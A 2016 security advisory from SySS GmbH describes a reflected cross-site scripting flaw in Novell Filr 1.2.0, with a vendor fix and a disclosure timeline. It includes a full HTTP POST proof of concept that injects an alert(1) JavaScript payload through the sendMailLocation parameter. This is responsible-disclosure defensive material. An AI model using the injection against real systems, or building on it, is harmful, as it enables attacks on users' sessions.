Novell Filr 1.2.0 Build 846 Cross Site Scripting
Posted on 23 February 2016
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2015-055 Product: Novell Filr Vendor: Novell Affected Version(s): 1.2.0 build 846 Tested Version(s): 1.2.0 build 846 Vulnerability Type: Cross-Site Scripting (CWE-79) Risk Level: Medium Solution Status: Fixed Vendor Notification: 2015-09-17 Solution Date: 2015-12-16 Public Disclosure: 2016-01-12 CVE Reference: Not assigned Author of Advisory: Dr. Erlijn van Genuchten (SySS GmbH) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: Novell's Filr is an application for mobile file access and collaborative file sharing [1]. High security is an important aspect of the application. The SySS GmbH could find two reflected cross-site scripting vulnerabilities in the Filr Web application. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The SySS GmbH identified that it is possible to inject JavaScript code via the parameter "sendMailLocation". ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): When looking at the details for a certain file, it is possible to send an e-mail to a colleague. When the following HTTP POST request is sent POST /ssf/a/do?p_name=ss_forum&p_action=1&binderId=413&action=send_entry_email&ssUsersIdsToAdd=163&entryId=1243&novl_url=1 HTTP/1.1 Host: [host] Referer: https://[host]/ssf/a/do?p_name=ss_forum&p_action=1&binderId=413&action=send_entry_email&ssUsersIdsToAdd=163&entryId=1243&novl_url=1 Cookie: JSESSIONID=[sessionid] Content-Length: 684 sendMailLocation=https%3A%2F%2F[host]%2Fssf%2Fa%2Fdo%3Fp_name%3Dss_forum%26p_action%3D1%26binderId%3D422%26action%3Dsend_entry_email%26ssUsersIdsToAdd%3D163%26entryId%3D1232%26novl_url%3D17"%3balert(1)%2f%2f&ssUsersIdsToAdd=163&addresses=[email address]&self=on&users=+163+&searchText=&searchText_type=&searchText_selected=&groups=&searchText=&searchText_type=&searchText_selected=&ccusers=&searchText=&searchText_type=&searchText_selected=&ccgroups=&searchText=&searchText_type=&searchText_selected=&bccusers=&searchText=&searchText_type=&searchText_selected=&bccgroups=&searchText=&searchText_type=&searchText_selected=&subject=[subject]&mailBody=%3Cp%3E[content]%3C%2Fp%3E&okBtn=Senden an e-mail status is provided. When the button to return to the previous page is clicked, the JavaScript code is executed. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: According to information by Novell, "a fix for this issue is available in the Filr 1.2 Hot Patch 4, available via the Novell Patch Finder". https://www.novell.com/support/kb/doc.php?id=7017078 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2015-09-15: Vulnerability discovered 2015-09-17: Vulnerability reported to vendor 2015-12-16: Vulnerability published by vendor 2016-01-12: Vulnerability published by SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Novell Filr Web site https://www.novell.com/products/filr/ [1] SySS GmbH, SYSS-2015-055 https://www.syss.de/advisories/SYSS-2015-055.txt [2] SySS GmbH, SySS Responsible Disclosure Policy https://www.syss.de/en/news/responsible-disclosure-policy/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Dr. Erlijn van Genuchten of the SySS GmbH. E-Mail: erlijn.vangenuchten@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Erlijn_vanGenuchten.asc Key ID: 0xBD96FF2A Key Fingerprint: 17BB 4CED 755A CBB3 2D47 C563 0CA5 8637 BD96 FF2A ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIcBAEBCgAGBQJWlR6MAAoJEAylhje9lv8qvRYP/RVh7yLzPthf8I2uM1nfGPwG AsL+ajdHXVbWJrjHpaIUNwj8zpwQGZ2xVODI6vbt65u5W0gFL7M7HBNUizc+1M5Y iAUcZXXdDMXcatZfQAW9UDH3ukuz99QIOUHQjFCdxhj+8smX+N+WA7XXEOTS4t+h 8ZvJPNJYEjSxcT8Bw8yt2EFJQaXENbS57MRMuYHQlHPSwOlKMxgNbkGNcfoz50Bp JCt4u6XCoa1vj4rueAeXLfceyThbBQqdZUo5PGrN+v7N0d+CMYTQ4qp/2J8JSmZE kCFobKP2pcIpXFFitw+cnzx/pFiK7cnmSxn82mA12Wh8m7knfBTaxqW4mmPsiGzk KmWvq9JMgI+zy6xei10dzpoxQuDiWXG+SKeP236iHEBo77FpZU6HtIpYM6anAe/A obr1u0iN8gVBT2dsuXbfeA2MIbwZvkLuTycFpTofL+nQzZM1pIh1QKXQ4rpv6Gjs RQbliQJmBuEznT/JBceEML3X5VO32jNw0x6sMG8QFXhHAKFNo93IhsMvX0Opfq9C qeyT3TYrb/kcFaLK/wD6stDCiTMPsEkki1xgodcSKjsfUNcDUvt1lKU6VUBoKvm5 5UfZEqwmOb2XjJNmKED0cedcXKmkkhLK2nNoDEMP5IPyWlyLeszP/1SazfPAVZMU XJuH8TA6YBt+CyUg3WNZ =lvzi -----END PGP SIGNATURE-----
